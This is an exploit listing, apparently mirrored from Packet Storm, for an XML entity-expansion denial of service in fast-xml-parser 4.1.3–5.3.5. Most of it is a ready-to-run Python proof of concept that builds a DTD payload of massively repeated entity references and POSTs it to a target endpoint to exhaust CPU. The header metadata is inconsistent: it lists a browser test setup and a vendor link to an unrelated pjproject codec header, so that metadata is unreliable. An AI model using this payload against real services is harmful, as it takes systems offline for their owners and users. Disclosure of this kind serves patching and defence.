## https://sploitus.com/exploit?id=PACKETSTORM:216285
=============================================================================================================================================
| # Title : XML Entity Expansion DenialโofโService (DoS) via Malicious DTD Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h |
=============================================================================================================================================
[+] Summary : A Denial-of-Service (DoS) vulnerability was identified in fast-xml-parser affecting versions 4.1.3 through 5.3.5.
The issue arises from improper handling of XML Document Type Definitions (DTD), specifically when processing internal entity expansion.
An attacker can supply a crafted XML payload containing recursively or massively referenced internal entities.
Even with a very small input size, the parser may be forced to perform excessive entity expansion.
[+] Affected Versions
4.1.3 through 5.3.5
[+] Fixed Version
5.3.6
[+] POC :
import requests
import time
TARGET_URL = "http://localhost:3000/parse-xml" # Replace with your target endpoint
def generate_malicious_xml():
"""
Generates a malicious XML payload that bypasses nested entity checks
but contains a massive amount of raw text for expansion.
"""
large_data = "A" * 50000
references = "&dos;" * 1000
xml_payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE exploit [
<!ENTITY dos "{large_data}">
]>
<root>
<trigger>{references}</trigger>
</root>
"""
return xml_payload
def launch_exploit(url):
"""
Sends the payload and measures the server's response time.
"""
payload = generate_malicious_xml()
print(f"[*] Malicious payload generated (Upload size: {len(payload) / 1024:.2f} KB)")
print(f"[*] Sending exploit to: {url}...")
start_time = time.time()
try:
response = requests.post(
url,
data=payload,
headers={'Content-Type': 'application/xml'},
timeout=10
)
print(f"[!] Server responded with status: {response.status_code}")
print("[?] Exploit might have failed or the server is protected.")
except requests.exceptions.Timeout:
duration = time.time() - start_time
print(f"[+] Exploit Successful! Server did not respond for {duration:.2f} seconds.")
print("[!] The Parser is now busy processing, consuming 100% CPU.")
except requests.exceptions.ConnectionError:
print("[!] Connection failed: The server might have crashed or the service is down.")
except Exception as e:
print(f"[-] An unexpected error occurred: {e}")
if __name__ == "__main__":
launch_exploit(TARGET_URL)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================